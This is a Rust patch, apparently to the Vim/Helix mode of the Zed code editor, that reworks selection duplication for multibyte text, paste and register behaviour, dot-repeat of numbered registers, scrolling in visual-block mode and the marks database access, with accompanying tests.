+use language::PointUtf16;
+use multi_buffer::MultiBufferRow;
use text::Bias;
use ui::Window;
use crate::Vim;
+#[derive(Copy, Clone)]
+enum Direction {
+ Above,
+ Below,
+}
+
impl Vim {
/// Creates a duplicate of every selection below it in the first place that has both its start
/// and end
@@ -16,14 +24,7 @@ impl Vim {
window: &mut Window,
cx: &mut Context<Self>,
) {
- self.duplicate_selections(
- times,
- window,
- cx,
- &|prev_point| *prev_point.row_mut() += 1,
- &|prev_range, map| prev_range.end.row() >= map.max_point().row(),
- false,
- );
+ self.duplicate_selections(times, window, cx, Direction::Below);
}
/// Creates a duplicate of every selection above it in the first place that has both its start
@@ -34,14 +35,7 @@ impl Vim {
window: &mut Window,
cx: &mut Context<Self>,
) {
- self.duplicate_selections(
- times,
- window,
- cx,
- &|prev_point| *prev_point.row_mut() = prev_point.row().0.saturating_sub(1),
- &|prev_range, _| prev_range.start.row() == DisplayPoint::zero().row(),
- true,
- );
+ self.duplicate_selections(times, window, cx, Direction::Above);
}
fn duplicate_selections(
@@ -49,9 +43,7 @@ impl Vim {
times: Option<usize>,
window: &mut Window,
cx: &mut Context<Self>,
- advance_search: &dyn Fn(&mut DisplayPoint),
- end_search: &dyn Fn(&Range<DisplayPoint>, &DisplaySnapshot) -> bool,
- above: bool,
+ direction: Direction,
) {
let times = times.unwrap_or(1);
self.update_editor(cx, |_, editor, cx| {
@@ -59,7 +51,7 @@ impl Vim {
let map = editor.display_snapshot(cx);
let mut original_selections = editor.selections.all_display(&map);
// The order matters, because it is recorded when the selections are added.
- if above {
+ if matches!(direction, Direction::Above) {
original_selections.reverse();
}
@@ -68,12 +60,9 @@ impl Vim {
selections.push(display_point_range_to_offset_range(&origin, &map));
let mut last_origin = origin;
for _ in 1..=times {
- if let Some(duplicate) = find_next_valid_duplicate_space(
- last_origin.clone(),
- &map,
- &advance_search,
- &end_search,
- ) {
+ if let Some(duplicate) =
+ find_next_valid_duplicate_space(last_origin.clone(), &map, direction)
+ {
selections.push(display_point_range_to_offset_range(&duplicate, &map));
last_origin = duplicate;
} else {
@@ -90,22 +79,62 @@ impl Vim {
}
fn find_next_valid_duplicate_space(
- mut origin: Range<DisplayPoint>,
+ origin: Range<DisplayPoint>,
map: &DisplaySnapshot,
- advance_search: &impl Fn(&mut DisplayPoint),
- end_search: &impl Fn(&Range<DisplayPoint>, &DisplaySnapshot) -> bool,
+ direction: Direction,
) -> Option<Range<DisplayPoint>> {
- while !end_search(&origin, map) {
- advance_search(&mut origin.start);
- advance_search(&mut origin.end);
+ let buffer = map.buffer_snapshot();
+ let start_col_utf16 = buffer
+ .point_to_point_utf16(origin.start.to_point(map))
+ .column;
+ let end_col_utf16 = buffer.point_to_point_utf16(origin.end.to_point(map)).column;
- if map.clip_point(origin.start, Bias::Left) == origin.start
- && map.clip_point(origin.end, Bias::Right) == origin.end
+ let mut candidate = origin;
+ loop {
+ match direction {
+ Direction::Below => {
+ if candidate.end.row() >= map.max_point().row() {
+ return None;
+ }
+ *candidate.start.row_mut() += 1;
+ *candidate.end.row_mut() += 1;
+ }
+ Direction::Above => {
+ if candidate.start.row() == DisplayPoint::zero().row() {
+ return None;
+ }
+ *candidate.start.row_mut() = candidate.start.row().0.saturating_sub(1);
+ *candidate.end.row_mut() = candidate.end.row().0.saturating_sub(1);
+ }
+ }
+
+ let start_row = DisplayPoint::new(candidate.start.row(), 0)
+ .to_point(map)
+ .row;
+ let end_row = DisplayPoint::new(candidate.end.row(), 0).to_point(map).row;
+
+ if start_col_utf16 > buffer.line_len_utf16(MultiBufferRow(start_row))
+ || end_col_utf16 > buffer.line_len_utf16(MultiBufferRow(end_row))
{
- return Some(origin);
+ continue;
+ }
+
+ let start_col = buffer
+ .point_utf16_to_point(PointUtf16::new(start_row, start_col_utf16))
+ .column;
+ let end_col = buffer
+ .point_utf16_to_point(PointUtf16::new(end_row, end_col_utf16))
+ .column;
+
+ let candidate_start = DisplayPoint::new(candidate.start.row(), start_col);
+ let candidate_end = DisplayPoint::new(candidate.end.row(), end_col);
+
+ if map.clip_point(candidate_start, Bias::Left) == candidate_start
+ && map.clip_point(candidate_end, Bias::Right) == candidate_end
+ {
+ return Some(candidate_start..candidate_end);
}
}
- None
}
fn display_point_range_to_offset_range(
@@ -231,4 +260,54 @@ mod tests {
Mode::HelixNormal,
);
}
+
+ #[gpui::test]
+ async fn test_selection_duplication_multiline_multibyte(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Multiline selection on rows with multibyte chars should preserve
+ // the visual column on both start and end rows.
+ cx.set_state(
+ indoc! {"
+ «H䡻llo
+ Hëllo
+ Hallo"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("C");
+
+ cx.assert_state(
+ indoc! {"
+ «H䡻llo
+ «H롻llo
+ Hallo"},
+ Mode::HelixNormal,
+ );
+ }
+
+ #[gpui::test]
+ async fn test_selection_duplication_multibyte(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Selection on a line with multibyte chars should duplicate to the
+ // same character column on the next line, not skip it.
+ cx.set_state(
+ indoc! {"
+ H«äˇ»llo
+ Hallo"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("C");
+
+ cx.assert_state(
+ indoc! {"
+ H«äˇ»llo
+ H«aˇ»llo"},
+ Mode::HelixNormal,
+ );
+ }
}
@@ -33,16 +33,14 @@ impl Vim {
let selected_register = vim.selected_register.take();
- let Some((text, clipboard_selections)) = Vim::update_globals(cx, |globals, cx| {
+ let Some(register) = Vim::update_globals(cx, |globals, cx| {
globals.read_register(selected_register, Some(editor), cx)
})
- .and_then(|reg| {
- (!reg.text.is_empty())
- .then_some(reg.text)
- .zip(reg.clipboard_selections)
- }) else {
+ .filter(|reg| !reg.text.is_empty()) else {
return;
};
+ let text = register.text;
+ let clipboard_selections = register.clipboard_selections;
let display_map = editor.display_snapshot(cx);
let current_selections = editor.selections.all_adjusted_display(&display_map);
@@ -63,7 +61,9 @@ impl Vim {
let mut replacement_texts: Vec<String> = Vec::new();
for ix in 0..current_selections.len() {
- let to_insert = if let Some(clip_sel) = clipboard_selections.get(ix) {
+ let to_insert = if let Some(clip_sel) =
+ clipboard_selections.as_ref().and_then(|s| s.get(ix))
+ {
let end_offset = start_offset + clip_sel.len;
let text = text[start_offset..end_offset].to_string();
start_offset = if clip_sel.is_entire_line {
@@ -102,13 +102,16 @@ impl Vim {
} else if action.before {
sel.start
} else if sel.start == sel.end {
- // Helix and Zed differ in how they understand
- // single-point cursors. In Helix, a single-point cursor
- // is "on top" of some character, and pasting after that
- // cursor means that the pasted content should go after
- // that character. (If the cursor is at the end of a
- // line, the pasted content goes on the next line.)
- movement::right(&display_map, sel.end)
+ // In Helix, a single-point cursor is "on top" of a
+ // character, and pasting after means after that character.
+ // At line end this means the next line. But on an empty
+ // line there is no character, so paste at the cursor.
+ let right = movement::right(&display_map, sel.end);
+ if right.row() != sel.end.row() && sel.end.column() == 0 {
+ sel.end
+ } else {
+ right
+ }
} else {
sel.end
};
@@ -146,8 +149,58 @@ impl Vim {
mod test {
use indoc::indoc;
+ use gpui::ClipboardItem;
+
use crate::{state::Mode, test::VimTestContext};
+ #[gpui::test]
+ async fn test_system_clipboard_paste(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+ cx.set_state(
+ indoc! {"
+ The quiˇck brown
+ fox jumps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+
+ cx.write_to_clipboard(ClipboardItem::new_string("clipboard".to_string()));
+ cx.simulate_keystrokes("p");
+ cx.assert_state(
+ indoc! {"
+ The quic«clipboardˇ»k brown
+ fox jumps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+
+ // Multiple cursors with system clipboard (no metadata) pastes
+ // the same text at each cursor.
+ cx.set_state(
+ indoc! {"
+ ˇThe quick brown
+ fox ˇjumps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+ cx.write_to_clipboard(ClipboardItem::new_string("hi".to_string()));
+ cx.simulate_keystrokes("p");
+ cx.assert_state(
+ indoc! {"
+ T«hiˇ»he quick brown
+ fox j«hiˇ»umps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+
+ // Multiple cursors on empty lines should paste on those same lines.
+ cx.set_state("ˇ\nˇ\nˇ\nend", Mode::HelixNormal);
+ cx.write_to_clipboard(ClipboardItem::new_string("X".to_string()));
+ cx.simulate_keystrokes("p");
+ cx.assert_state("«Xˇ»\n«Xˇ»\n«Xˇ»\nend", Mode::HelixNormal);
+ }
+
#[gpui::test]
async fn test_paste(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -1924,9 +1924,10 @@ fn next_subword_start(
let found_subword_start = is_subword_start(left, right, ".$_-");
let is_word_start = (left_kind != right_kind)
&& (!right.is_ascii_punctuation() || is_stopping_punct(right));
+
let found = (!right.is_whitespace() && (is_word_start || found_subword_start))
|| at_newline && crossed_newline
- || at_newline && left == '\n'; // Prevents skipping repeated empty lines
+ || right == '\n' && left == '\n'; // Prevents skipping repeated empty lines
crossed_newline |= at_newline;
found
@@ -949,17 +949,16 @@ impl Vim {
let current_line = point.row;
let percentage = current_line as f32 / lines as f32;
let modified = if buffer.is_dirty() { " [modified]" } else { "" };
- vim.status_label = Some(
+ vim.set_status_label(
format!(
"{}{} {} lines --{:.0}%--",
filename,
modified,
lines,
percentage * 100.0,
- )
- .into(),
+ ),
+ cx,
);
- cx.notify();
});
}
@@ -50,6 +50,10 @@ impl Vim {
})
.filter(|reg| !reg.text.is_empty())
else {
+ vim.set_status_label(
+ format!("Nothing in register {}", selected_register.unwrap_or('"')),
+ cx,
+ );
return;
};
let clipboard_selections = clipboard_selections
@@ -249,7 +253,7 @@ impl Vim {
) {
self.stop_recording(cx);
let selected_register = self.selected_register.take();
- self.update_editor(cx, |_, editor, cx| {
+ self.update_editor(cx, |vim, editor, cx| {
editor.transact(window, cx, |editor, window, cx| {
editor.set_clip_at_line_ends(false, cx);
editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
@@ -262,6 +266,10 @@ impl Vim {
globals.read_register(selected_register, Some(editor), cx)
})
.filter(|reg| !reg.text.is_empty()) else {
+ vim.set_status_label(
+ format!("Nothing in register {}", selected_register.unwrap_or('"')),
+ cx,
+ );
return;
};
editor.insert(&text, window, cx);
@@ -286,7 +294,7 @@ impl Vim {
) {
self.stop_recording(cx);
let selected_register = self.selected_register.take();
- self.update_editor(cx, |_, editor, cx| {
+ self.update_editor(cx, |vim, editor, cx| {
let text_layout_details = editor.text_layout_details(window, cx);
editor.transact(window, cx, |editor, window, cx| {
editor.set_clip_at_line_ends(false, cx);
@@ -306,6 +314,10 @@ impl Vim {
globals.read_register(selected_register, Some(editor), cx)
})
.filter(|reg| !reg.text.is_empty()) else {
+ vim.set_status_label(
+ format!("Nothing in register {}", selected_register.unwrap_or('"')),
+ cx,
+ );
return;
};
editor.insert(&text, window, cx);
@@ -291,6 +291,24 @@ impl Vim {
}) else {
return;
};
+
+ // Dot repeat always uses the recorded register, ignoring any "X
+ // override, as the register is an inherent part of the recorded action.
+ // For numbered registers, Neovim increments on each dot repeat so after
+ // using `"1p`, using `.` will equate to `"2p", the next `.` to `"3p`,
+ // etc..
+ let recorded_register = cx.global::<VimGlobals>().recorded_register_for_dot;
+ let next_register = recorded_register
+ .filter(|c| matches!(c, '1'..='9'))
+ .map(|c| ((c as u8 + 1).min(b'9')) as char);
+
+ self.selected_register = next_register.or(recorded_register);
+ if let Some(next_register) = next_register {
+ Vim::update_globals(cx, |globals, _| {
+ globals.recorded_register_for_dot = Some(next_register)
+ })
+ };
+
if mode != Some(self.mode) {
if let Some(mode) = mode {
self.switch_mode(mode, false, window, cx)
@@ -441,6 +459,207 @@ mod test {
cx.shared_state().await.assert_eq("THE QUICK ˇbrown fox");
}
+ #[gpui::test]
+ async fn test_dot_repeat_registers_paste(cx: &mut gpui::TestAppContext) {
+ let mut cx = NeovimBackedTestContext::new(cx).await;
+
+ // basic paste repeat uses the unnamed register
+ cx.set_shared_state("ˇhello\n").await;
+ cx.simulate_shared_keystrokes("y y p").await;
+ cx.shared_state().await.assert_eq("hello\nˇhello\n");
+ cx.simulate_shared_keystrokes(".").await;
+ cx.shared_state().await.assert_eq("hello\nhello\nˇhello\n");
+
+ // "_ (blackhole) is recorded and replayed, so the pasted text is still
+ // the original yanked line.
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ four
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("y y j \" _ d d . p").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ one
+ four
+ ˇone
+ "});
+
+ // the recorded register is replayed, not whatever is in the unnamed register
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("y y j \" a y y \" a p .")
+ .await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ one
+ two
+ two
+ ˇtwo
+ "});
+
+ // `"X.` ignores the override and always uses the recorded register.
+ // Both `dd` calls go into register `a`, so register `b` is empty and
+ // `"bp` pastes nothing.
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("\" a d d \" b .").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ ˇthree
+ "});
+ cx.simulate_shared_keystrokes("\" a p \" b p").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ three
+ ˇtwo
+ "});
+
+ // numbered registers cycle on each dot repeat: "1p . . uses registers 2, 3, …
+ // Since the cycling behavior caps at register 9, the first line to be
+ // deleted `1`, is no longer in any of the registers.
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ four
+ five
+ six
+ seven
+ eight
+ nine
+ ten
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("d d . . . . . . . . .").await;
+ cx.shared_state().await.assert_eq(indoc! {"ˇ"});
+ cx.simulate_shared_keystrokes("\" 1 p . . . . . . . . .")
+ .await;
+ cx.shared_state().await.assert_eq(indoc! {"
+
+ ten
+ nine
+ eight
+ seven
+ six
+ five
+ four
+ three
+ two
+ ˇtwo"});
+
+ // unnamed register repeat: dd records None, so . pastes the same
+ // deleted text
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("d d p .").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ two
+ one
+ ˇone
+ three
+ "});
+
+ // After `"1p` cycles to `2`, using `"ap` resets recorded_register to `a`,
+ // so the next `.` uses `a` and not 3.
+ cx.set_shared_state(indoc! {"
+ one
+ two
+ ˇthree
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("\" 2 y y k k \" a y y j \" 1 y y k \" 1 p . \" a p .")
+ .await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ one
+ two
+ three
+ one
+ ˇone
+ two
+ three
+ "});
+ }
+
+ // This needs to be a separate test from `test_dot_repeat_registers_paste`
+ // as Neovim doesn't have support for using registers in replace operations
+ // by default.
+ #[gpui::test]
+ async fn test_dot_repeat_registers_replace(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+
+ cx.set_state(
+ indoc! {"
+ line ˇone
+ line two
+ line three
+ "},
+ Mode::Normal,
+ );
+
+ // 1. Yank `one` into register `a`
+ // 2. Move down and yank `two` into the default register
+ // 3. Replace `two` with the contents of register `a`
+ cx.simulate_keystrokes("\" a y w j y w \" a g R w");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line onˇe
+ line three
+ "},
+ Mode::Normal,
+ );
+
+ // 1. Move down to `three`
+ // 2. Repeat the replace operation
+ cx.simulate_keystrokes("j .");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line one
+ line onˇe
+ "},
+ Mode::Normal,
+ );
+
+ // Similar test, but this time using numbered registers, as those should
+ // automatically increase on successive uses of `.` .
+ cx.set_state(
+ indoc! {"
+ line ˇone
+ line two
+ line three
+ line four
+ "},
+ Mode::Normal,
+ );
+
+ // 1. Yank `one` into register `1`
+ // 2. Yank `two` into register `2`
+ // 3. Move down and yank `three` into the default register
+ // 4. Replace `three` with the contents of register `1`
+ // 5. Move down and repeat
+ cx.simulate_keystrokes("\" 1 y w j \" 2 y w j y w \" 1 g R w j .");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line two
+ line one
+ line twˇo
+ "},
+ Mode::Normal,
+ );
+ }
+
#[gpui::test]
async fn test_repeat_ime(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -88,82 +88,74 @@ pub fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
impl Vim {
fn scroll(
&mut self,
- move_cursor: bool,
+ preserve_cursor_position: bool,
window: &mut Window,
cx: &mut Context<Self>,
by: fn(c: Option<f32>) -> ScrollAmount,
) {
let amount = by(Vim::take_count(cx).map(|c| c as f32));
- let mode = self.mode;
Vim::take_forced_motion(cx);
self.exit_temporary_normal(window, cx);
- self.update_editor(cx, |_, editor, cx| {
- scroll_editor(editor, mode, move_cursor, amount, window, cx)
- });
+ self.scroll_editor(preserve_cursor_position, amount, window, cx);
}
-}
-fn scroll_editor(
- editor: &mut Editor,
- mode: Mode,
- preserve_cursor_position: bool,
- amount: ScrollAmount,
- window: &mut Window,
- cx: &mut Context<Editor>,
-) {
- let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq();
- let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
- let old_top = editor
- .scroll_manager
- .scroll_top_display_point(&display_snapshot, cx);
-
- if editor.scroll_hover(amount, window, cx) {
- return;
- }
+ fn scroll_editor(
+ &mut self,
+ preserve_cursor_position: bool,
+ amount: ScrollAmount,
+ window: &mut Window,
+ cx: &mut Context<Vim>,
+ ) {
+ self.update_editor(cx, |vim, editor, cx| {
+ let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq();
+ let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
+ let old_top = editor
+ .scroll_manager
+ .scroll_top_display_point(&display_snapshot, cx);
+
+ if editor.scroll_hover(amount, window, cx) {
+ return;
+ }
- let full_page_up = amount.is_full_page() && amount.direction().is_upwards();
- let amount = match (amount.is_full_page(), editor.visible_line_count()) {
- (true, Some(visible_line_count)) => {
- if amount.direction().is_upwards() {
- ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32)
- } else {
- ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32)
+ let full_page_up = amount.is_full_page() && amount.direction().is_upwards();
+ let amount = match (amount.is_full_page(), editor.visible_line_count()) {
+ (true, Some(visible_line_count)) => {
+ if amount.direction().is_upwards() {
+ ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32)
+ } else {
+ ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32)
+ }
+ }
+ _ => amount,
+ };
+
+ editor.scroll_screen(&amount, window, cx);
+ if !should_move_cursor {
+ return;
}
- }
- _ => amount,
- };
- editor.scroll_screen(&amount, window, cx);
- if !should_move_cursor {
- return;
- }
+ let Some(visible_line_count) = editor.visible_line_count() else {
+ return;
+ };
- let Some(visible_line_count) = editor.visible_line_count() else {
- return;
- };
+ let Some(visible_column_count) = editor.visible_column_count() else {
+ return;
+ };
- let Some(visible_column_count) = editor.visible_column_count() else {
- return;
- };
+ let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
+ let top = editor
+ .scroll_manager
+ .scroll_top_display_point(&display_snapshot, cx);
+ let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin;
- let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
- let top = editor
- .scroll_manager
- .scroll_top_display_point(&display_snapshot, cx);
- let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin;
-
- editor.change_selections(
- SelectionEffects::no_scroll().nav_history(false),
- window,
- cx,
- |s| {
- s.move_with(&mut |map, selection| {
+ let mut move_cursor = |map: &editor::display_map::DisplaySnapshot,
+ mut head: DisplayPoint,
+ goal: SelectionGoal| {
// TODO: Improve the logic and function calls below to be dependent on
// the `amount`. If the amount is vertical, we don't care about
// columns, while if it's horizontal, we don't care about rows,
// so we don't need to calculate both and deal with logic for
// both.
- let mut head = selection.head();
let max_point = map.max_point();
let starting_column = head.column();
@@ -171,17 +163,18 @@ fn scroll_editor(
(vertical_scroll_margin as u32).min(visible_line_count as u32 / 2);
if preserve_cursor_position {
- let new_row = if old_top.row() == top.row() {
- DisplayRow(
- head.row()
- .0
- .saturating_add_signed(amount.lines(visible_line_count) as i32),
- )
- } else {
- DisplayRow(top.row().0.saturating_add_signed(
- selection.head().row().0 as i32 - old_top.row().0 as i32,
- ))
- };
+ let new_row =
+ if old_top.row() == top.row() {
+ DisplayRow(
+ head.row()
+ .0
+ .saturating_add_signed(amount.lines(visible_line_count) as i32),
+ )
+ } else {
+ DisplayRow(top.row().0.saturating_add_signed(
+ head.row().0 as i32 - old_top.row().0 as i32,
+ ))
+ };
head = map.clip_point(DisplayPoint::new(new_row, head.column()), Bias::Left)
}
@@ -259,17 +252,36 @@ fn scroll_editor(
let new_head = map.clip_point(DisplayPoint::new(new_row, new_column), Bias::Left);
let goal = match amount {
ScrollAmount::Column(_) | ScrollAmount::PageWidth(_) => SelectionGoal::None,
- _ => selection.goal,
+ _ => goal,
};
- if selection.is_empty() || !mode.is_visual() {
- selection.collapse_to(new_head, goal)
- } else {
- selection.set_head(new_head, goal)
- };
- })
- },
- );
+ Some((new_head, goal))
+ };
+
+ if vim.mode == Mode::VisualBlock {
+ vim.visual_block_motion(true, editor, window, cx, &mut move_cursor);
+ } else {
+ editor.change_selections(
+ SelectionEffects::no_scroll().nav_history(false),
+ window,
+ cx,
+ |s| {
+ s.move_with(&mut |map, selection| {
+ if let Some((new_head, goal)) =
+ move_cursor(map, selection.head(), selection.goal)
+ {
+ if selection.is_empty() || !vim.mode.is_visual() {
+ selection.collapse_to(new_head, goal)
+ } else {
+ selection.set_head(new_head, goal)
+ }
+ }
+ })
+ },
+ );
+ }
+ });
+ }
}
#[cfg(test)]
@@ -282,12 +282,12 @@ impl Vim {
/// Pastes the clipboard contents, replacing the same number of characters
/// as the clipboard's contents.
pub fn paste_replace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- let clipboard_text =
- cx.read_from_clipboard()
- .and_then(|item| match item.entries().first() {
- Some(ClipboardEntry::String(text)) => Some(text.text().to_string()),
- _ => None,
- });
+ let clipboard_text = cx.read_from_clipboard().and_then(|item| {
+ item.entries().iter().find_map(|entry| match entry {
+ ClipboardEntry::String(text) => Some(text.text().to_string()),
+ _ => None,
+ })
+ });
if let Some(text) = clipboard_text {
self.push_operator(Operator::Replace, window, cx);
@@ -1,19 +1,20 @@
use crate::{Vim, motion::Motion, object::Object, state::Mode};
use collections::HashMap;
use editor::{Bias, Editor, RewrapOptions, SelectionEffects, display_map::ToDisplayPoint};
-use gpui::{Context, Window, actions};
+use gpui::{Action, Context, Window};
use language::SelectionGoal;
+use schemars::JsonSchema;
+use serde::Deserialize;
-actions!(
- vim,
- [
- /// Rewraps the selected text to fit within the line width.
- Rewrap
- ]
-);
+/// Rewraps the selected text to fit within the line width.
+#[derive(Clone, Deserialize, JsonSchema, PartialEq, Action)]
+#[action(namespace = vim)]
+pub(crate) struct Rewrap {
+ pub line_length: Option<usize>,
+}
pub(crate) fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
- Vim::action(editor, cx, |vim, _: &Rewrap, window, cx| {
+ Vim::action(editor, cx, |vim, action: &Rewrap, window, cx| {
vim.record_current_action(cx);
Vim::take_count(cx);
Vim::take_forced_motion(cx);
@@ -24,6 +25,7 @@ pub(crate) fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
editor.rewrap_impl(
RewrapOptions {
override_language_settings: true,
+ line_length: action.line_length,
..Default::default()
},
cx,
@@ -73,6 +73,10 @@ impl Mode {
Self::Normal | Self::Insert | Self::Replace | Self::HelixNormal => false,
}
}
+
+ pub fn is_helix(&self) -> bool {
+ matches!(self, Self::HelixNormal | Self::HelixSelect)
+ }
}
#[derive(Clone, Debug, PartialEq)]
@@ -187,14 +191,15 @@ impl From<Register> for ClipboardItem {
impl From<ClipboardItem> for Register {
fn from(item: ClipboardItem) -> Self {
- // For now, we don't store metadata for multiple entries.
- match item.entries().first() {
- Some(ClipboardEntry::String(value)) if item.entries().len() == 1 => Register {
+ match item.entries().iter().find_map(|entry| match entry {
+ ClipboardEntry::String(value) => Some(value),
+ _ => None,
+ }) {
+ Some(value) => Register {
text: value.text().to_owned().into(),
clipboard_selections: value.metadata_json::<Vec<ClipboardSelection>>(),
},
- // For now, registers can't store images. This could change in the future.
- _ => Register::default(),
+ None => Register::default(),
}
}
}
@@ -228,7 +233,15 @@ pub struct VimGlobals {
pub recorded_actions: Vec<ReplayableAction>,
pub recorded_selection: RecordedSelection,
+ /// The register being written to by the active `q{register}` macro
+ /// recording.
pub recording_register: Option<char>,
+ /// The register that was selected at the start of the current
+ /// dot-recording, for example, `"ap`.
+ pub recording_register_for_dot: Option<char>,
+ /// The register from the last completed dot-recording. Used when replaying
+ /// with `.`.
+ pub recorded_register_for_dot: Option<char>,
pub last_recorded_register: Option<char>,
pub last_replayed_register: Option<char>,
pub replayer: Option<Replayer>,
@@ -310,10 +323,11 @@ impl MarksState {
let Some(workspace_id) = this.update(cx, |this, cx| this.workspace_id(cx)).ok()? else {
return None;
};
+ let db = cx.update(|cx| VimDb::global(cx));
let (marks, paths) = cx
.background_spawn(async move {
- let marks = DB.get_marks(workspace_id)?;
- let paths = DB.get_global_marks_paths(workspace_id)?;
+ let marks = db.get_marks(workspace_id)?;
+ let paths = db.get_global_marks_paths(workspace_id)?;
anyhow::Ok((marks, paths))
})
.await
@@ -432,8 +446,9 @@ impl MarksState {
if let Some(workspace_id) = self.workspace_id(cx) {
let path = path.clone();
let key = key.clone();
+ let db = VimDb::global(cx);
cx.background_spawn(async move {
- DB.set_global_mark_path(workspace_id, key, path).await
+ db.set_global_mark_path(workspace_id, key, path).await
})
.detach_and_log_err(cx);
}
@@ -449,8 +464,9 @@ impl MarksState {
self.serialized_marks.insert(path.clone(), new_points);
if let Some(workspace_id) = self.workspace_id(cx) {
+ let db = VimDb::global(cx);
cx.background_spawn(async move {
- DB.set_marks(workspace_id, path.clone(), to_write).await?;
+ db.set_marks(workspace_id, path.clone(), to_write).await?;
anyhow::Ok(())
})
.detach_and_log_err(cx);
@@ -515,7 +531,7 @@ impl MarksState {
cx: &mut Context<Self>,
) {
let on_change = cx.subscribe(buffer_handle, move |this, buffer, event, cx| match event {
- BufferEvent::Edited => {
+ BufferEvent::Edited { .. } => {
if let Some(path) = this.path_for_buffer(&buffer, cx) {
this.serialize_buffer_marks(path, &buffer, cx);
}
@@ -643,8 +659,9 @@ impl MarksState {
let path = if let Some(target) = self.global_marks.get(&mark_name.clone()) {
let name = mark_name.clone();
if let Some(workspace_id) = self.workspace_id(cx) {
+ let db = VimDb::global(cx);
cx.background_spawn(async move {
- DB.delete_global_marks_path(workspace_id, name).await
+ db.delete_global_marks_path(workspace_id, name).await
})
.detach_and_log_err(cx);
}
@@ -684,7 +701,8 @@ impl MarksState {
.get_mut(&path)
.map(|m| m.remove(&mark_name.clone()));
if let Some(workspace_id) = self.workspace_id(cx) {
- cx.background_spawn(async move { DB.delete_mark(workspace_id, path, mark_name).await })
+ let db = VimDb::global(cx);
+ cx.background_spawn(async move { db.delete_mark(workspace_id, path, mark_name).await })
.detach_and_log_err(cx);
}
}
@@ -915,6 +933,7 @@ impl VimGlobals {
self.dot_recording = false;
self.recorded_actions = std::mem::take(&mut self.recording_actions);
self.recorded_count = self.recording_count.take();
+ self.recorded_register_for_dot = self.recording_register_for_dot.take();
self.stop_recording_after_next_action = false;
}
}
@@ -942,6 +961,7 @@ impl VimGlobals {
self.dot_recording = false;
self.recorded_actions = std::mem::take(&mut self.recording_actions);
self.recorded_count = self.recording_count.take();
+ self.recorded_register_for_dot = self.recording_register_for_dot.take();
self.stop_recording_after_next_action = false;
}
}
@@ -1750,7 +1770,7 @@ impl Domain for VimDb {
];
}
-db::static_connection!(DB, VimDb, [WorkspaceDb]);
+db::static_connection!(VimDb, [WorkspaceDb]);
struct SerializedMark {
path: Arc<Path>,
@@ -30,6 +30,7 @@ impl VimTestContext {
theme::init(theme::LoadThemes::JustBase, cx);
settings_ui::init(cx);
markdown_preview::init(cx);
+ zed_actions::init();
});
}
@@ -635,7 +635,7 @@ impl Vim {
fn activate(editor: &mut Editor, window: &mut Window, cx: &mut Context<Editor>) {
let vim = Vim::new(window, cx);
let state = vim.update(cx, |vim, cx| {
- if !editor.mode().is_full() {
+ if !editor.use_modal_editing() {
vim.mode = Mode::Insert;
}
@@ -996,7 +996,14 @@ impl Vim {
cx: &mut Context<Vim>,
f: impl Fn(&mut Vim, &A, &mut Window, &mut Context<Vim>) + 'static,
) {
- let subscription = editor.register_action(cx.listener(f));
+ let subscription = editor.register_action(cx.listener(move |vim, action, window, cx| {
+ if !Vim::globals(cx).dot_replaying {
+ if vim.status_label.take().is_some() {
+ cx.notify();
+ }
+ }
+ f(vim, action, window, cx);
+ }));
cx.on_release(|_, _| drop(subscription)).detach();
}
@@ -1155,7 +1162,6 @@ impl Vim {
let last_mode = self.mode;
let prior_mode = self.last_mode;
let prior_tx = self.current_tx;
- self.status_label.take();
self.last_mode = last_mode;
self.mode = mode;
self.operator_stack.clear();
